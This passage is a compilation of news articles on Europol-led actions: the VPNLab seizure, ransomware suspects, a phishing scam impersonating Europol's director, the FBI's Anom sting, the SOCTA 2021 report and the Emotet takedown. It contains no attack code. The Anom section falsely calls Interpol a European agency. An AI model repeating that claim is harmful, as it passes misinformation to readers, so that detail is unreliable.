The vpnlab.net domain now shows a notice telling visitors that the domain has been seized by law enforcement. According to the statement, authorities obtained customer data held on the confiscated servers, and an inquiry has been opened. Europol has not revealed which types of malware and ransomware were distributed using the VPN provider. As a result of the investigation, more than 100 organizations have been identified as being at risk of cyberattacks, and law enforcement is working with them to mitigate any possible compromise. 

"The actions carried out under this investigation make clear that criminals are running out of ways to hide their tracks online," said Edvardas Šileris, head of Europol's European Cybercrime Centre (EC3). "Each investigation we undertake informs the next, and the information gained on potential victims means we may have pre-empted several serious cyberattacks and data breaches," he added. 

On January 17, 2022, authorities from Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States, and the United Kingdom joined forces to disrupt VPNLab, with assistance from Europol.

Europol 'Targets' 12 Suspects in Ransomware Cases

 

Europol announced this week that, following a two-year investigation, it has caught twelve suspects from various criminal groups who were causing havoc throughout the world by conducting ransomware attacks on critical infrastructure. 

According to Europol, the individuals are suspected of carrying out attacks on almost 1,800 victims in 71 countries. The group is notorious for attacking large corporations and is suspected of being behind the 2019 attack on Norsk Hydro, a global aluminium producer based in Norway, which forced the company to halt operations across two continents. Europol seized more than $52,000 in cash and five luxury vehicles from the accused. 

The agency is currently conducting a forensic examination of the group's electronic devices to secure evidence and uncover fresh investigative leads. Europol and Eurojust, the European Union's body for criminal justice cooperation, organised the international sting, which involved officials from eight nations, including the United States and the United Kingdom. According to Europol, it took place on October 26 in Ukraine and Switzerland. It is unclear whether the individuals have been arrested or charged, with Europol stating only that they were "targeted." 

The agency stated: “Most of these suspects are considered high-value targets because they are being investigated in multiple high-profile cases in different jurisdictions.” 

Each of the cybercriminals played a distinct role within the criminal organisations. Some were responsible for breaking into victims' IT networks, which they accomplished through a variety of methods such as brute-force attacks, SQL injection, stolen passwords, and phishing emails with malicious attachments. 

They would then use malware such as Trickbot and other tools to remain undetected and gain further access, according to Europol. 

“The criminals would then lay undetected in the compromised systems, sometimes for months, probing for more weaknesses in the IT networks before moving on to monetising the infection by deploying ransomware. The effects of the ransomware attacks were devastating as the criminals had had the time to explore the IT networks undetected.” 

The attackers encrypted the victims' files before leaving a ransom note demanding payment in bitcoin in return for the decryption keys. If the ransom was paid, certain suspects were reportedly in charge of laundering the money through mixing services and cashing out. 

Europol did not elaborate on the identities of the victims or why they may have been targeted. In the United Kingdom, ransomware attacks have been on the rise, with cybercriminals targeting big IT businesses and disrupting infrastructure.

Fraudsters Pose as Europol Chief in an Attempt to Steal Victims' PayPal Account Details

 

The Belgian federal police's Computer Crime Unit is looking into an identity fraud case involving Catherine De Bolle, executive director of Europol, the European Union's law enforcement agency. Fraudsters are masquerading as her to trick individuals into handing over their financial information. 

The European Union Agency for Law Enforcement Cooperation, popularly known as Europol and previously called the European Police Office and the Europol Drugs Unit, is a law enforcement agency of the European Union (EU) established in 1998 to manage criminal intelligence and counter serious international organized crime and terrorism through cooperation among the competent authorities of EU member states. The agency has no executive powers, and its personnel are not authorized to detain suspects or act without prior consent from the appropriate authorities in the member states. 

According to the Brussels Times, Belgian police have received numerous reports of emails purporting to come from Catherine De Bolle, Europol's executive director. The email accuses the recipient of child pornography and sex trafficking offences before attempting to steal the recipient's PayPal account details. 

Catherine De Bolle took over as Europol's executive director in 2018, following Rob Wainwright, whose tenure ended on May 1, 2018. She was previously the top commissioner of the Belgian federal police (1 March 2012–1 May 2018) as well as the police chief of zone Ninove (2001–2012). 

Europol, which had warned about this type of scam in April, once again asked web users not to fall for it. 

“Our executive director would never contact members of the public threatening individuals with opening a criminal investigation,” tweeted Europol, which does investigate a great deal of real cybercrime. 

The email is written in French, and the sender introduces themselves as a COPJ (communication by an officer of the judicial police). It begins: 

“At the request of Ms. Catherine De Bolle, Commissioner General of the Federal Police, elected to the post of Director of Europol — Brigade for the Protection of Minors (BPM), we are sending you this invitation. […] We are initiating legal proceedings against you for child pornography, pedophilia, exhibitionism, cyber pornography, and sex trafficking.” 

The email threatens the recipient with criminal prosecution if they do not respond within 72 hours. 

“After this deadline, we will be obliged to send our report to the deputy prosecutor at the high court in Créteil [a suburb of Paris] and a cybercrime specialist to establish an arrest warrant against you.” 

This is not the first time Director De Bolle's name has been used in a phishing scam. In March of this year, another fraudulent email invoked her authority, and that of her successor as commissioner-general of the federal police, Marc De Mesmaeker. 

According to the FBI's Internet Crime Complaint Center, 12,827 individuals in the United States reported being victims of "government impersonation scams" in 2020, with losses of about $110 million. 

Similarly, Check Point analysts disclosed in April 2020 that a ransomware gang was locking Android phones, accusing victims of possessing sexually explicit material and claiming that their personally identifiable information had been transmitted to an FBI data center.

Among the most high-profile impersonation frauds was one in July 2020, in which fraudsters stole over $118,000 in bitcoin by hijacking more than 100 famous Twitter accounts, including those of then-Amazon CEO Jeff Bezos and then-Democratic presidential contender Joe Biden.

International Sting Operation Cracks Down on Criminal Groups Using Encrypted Phones

An international sting operation targeting drug suppliers led to the arrest of a man; the Australian Federal Police blurred the suspect's face for privacy reasons. The criminals, while arranging drug smuggling and money laundering, texted each other confident that they would not get caught, because they were using a special encrypted platform for communication. The one problem for the group was that all of these texts, millions of them, were being read by the FBI. 

In fact, the FBI itself had put these Anom devices onto the black market. The details and allegations are set out in the court documents of Operation Trojan Shield, an international operation led by the FBI that has resulted in more than 800 arrests. NPR says "the document includes transcripts of smugglers' conversations in which they name their prices and handling fees and describe their methods. Many of them also sent snapshots to each other, showing packages of cocaine and other drugs. They discussed strategies, from adding drugs to diplomatic pouches to filling pineapples and tuna cans with cocaine." 

Law enforcement agencies seized around 8 tonnes of cocaine, around 22 tonnes of cannabis, and several tonnes of other drugs. In addition, authorities seized "55 luxury vehicles and over $48 million in various worldwide currencies and cryptocurrencies," says Interpol, a European law enforcement agency. According to the FBI, the agencies together supplied more than 12,000 devices to criminal organizations operating all over the world. Europol says it was one of the largest and most sophisticated law enforcement operations against encrypted criminal communications to date. Using Anom, the FBI and Europol tracked around 300 Transnational Criminal Organizations (TCOs). 

These include Italian organized crime groups, outlaw motorcycle gangs, and international narcotics sourcing, distribution, and transportation networks. "Law enforcement agencies were in a unique position to help the new Anom device find its market. In recent years, they've taken down three similar networks — Phantom Secure, EncroChat and, earlier this year, Sky Global — boosting criminals' demand for a new alternative," said NPR.

SOCTA: Here's a Quick Look into the Report by Europol

 

Europol's Serious and Organised Crime Threat Assessment (SOCTA) 2021 summarises the criminal threat of the last four years and offers insights into what can be expected over the next four. Organized crime is not just cybercrime, but cybercrime is now a big component of organized crime. Europol sees the growth of online business, the digital lifestyle, and the rise of remote work as new vulnerabilities and opportunities for criminals to exploit. 

“Critical infrastructures will continue to be targeted by cybercriminals in the coming years, which poses significant risks,” cautions the published report. “Developments such as the expansion of the Internet of Things (IoT), the increased use of artificial intelligence (AI), applications for biometrics data, or the availability of autonomous vehicles will have a significant impact. These innovations will create criminal opportunities.” 

The report highlights the disruption of the Emotet botnet in January 2021, an international effort coordinated by Europol involving the authorities of the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine. The overall assessment is that cybercrime is growing more sophisticated and criminal gangs are becoming increasingly organized, so the threat is multiplying rapidly. However, the Europol report says little about specific cyber threats, apart from noting that crime syndicates increasingly sell cybercrime 'as a service'. 

ENISA estimates that 230,000 new malware variants are detected each day. Europol notes that the number and sophistication of attacks continue to increase: “The increase in the number of attacks on public institutions and large companies is particularly notable.” Distributed denial-of-service (DDoS) attacks are an expanding threat, frequently followed by extortion attempts. Attacks on government and critical infrastructure continue, but criminal groups increasingly target smaller organizations with weaker security. 

“Last year saw a multitude of damaging consequences from ransomware, breaches, and targeted attacks against sensitive data,” comments Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber. Cyber attackers have taken full advantage of critical vulnerabilities to the detriment of organizations, ranging from hacks of COVID-19 research data to attacks on critical networks and government agencies. Online child exploitation, especially what is known as live distance child abuse, also increased as students spent months at home during school closures. Europol also states that it has a database of over 40 million child sexual abuse images from around the globe. 

Furthermore, the role of the dark web in illegal activities should not be underestimated; criminals use it to share knowledge on operational security. The use of the dark web for selling illicit drugs and weapons has increased over the past four years, but law enforcement action appears to have caused some mistrust among buyers and may have slowed that growth, along with the growth of online attacks. Trafficking in human beings (THB) is also carried out on both the dark web and the surface web, where labor and sex are the main categories of exploitation. Europol says THB is substantially underreported and that in the EU, THB for labor exploitation is on the rise. 

Fraud has also grown more technically sophisticated, with schemes such as investment fraud, BEC, non-delivery fraud, novelty fraud, fake invoice fraud, social benefit fraud, and bank fraud, and this trend will probably continue. “The use of deep fakes will make it much more challenging to identify and counter fraud,” warns Europol. The organized crime ecosystem is marked by a networked environment with smooth, systemic, and profitable coordination among criminals.

Emotet - 'Most Dangerous Malware in the World' Disrupted by Law Enforcement Agencies

 

Europol, the European Union Agency for Law Enforcement Cooperation, announced that a global collaboration of law enforcement agencies had disrupted Emotet, which it called the ‘most dangerous malware in the world’.

‘Operation Ladybird’ was a collaboration between private security experts and global law enforcement agencies to disrupt Emotet and take control of its command-and-control infrastructure. During the raids, Ukrainian police arrested at least two Ukrainian citizens working for the cybercriminal group.

Ukrainian law enforcement published a video showing officers seizing cash, computer equipment, and rows of gold bars. Neither Europol nor the Ukrainian police have shared details about the suspects or their alleged role in the Emotet group. Ukrainian authorities released a statement explaining that “other members of an international hacker group who used the infrastructure of the Emotet bot network to conduct cyberattacks have also been identified. Measures are being taken to detain them”.

Europol stated that “the Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale”. Emotet has grown into one of the biggest botnets in the world, devastating organizations through data theft and ransomware.

First seen in 2014 as a banking trojan, Emotet gradually evolved into a powerful tool used by threat actors across the globe to gain unauthorized access to computer systems. Emotet's operators, known as the APT group TA542, rented the malware to other threat actors, who used it to install banking trojans or ransomware on victims' computer systems.

Interpol stated that “the infrastructure that was used by Emotet involved several hundreds of servers located across the world, all of these having different functionalities to manage the computers of the infected victims, to spread to new ones, to serve other criminal groups, and to ultimately make the network more resilient against takedown attempts”.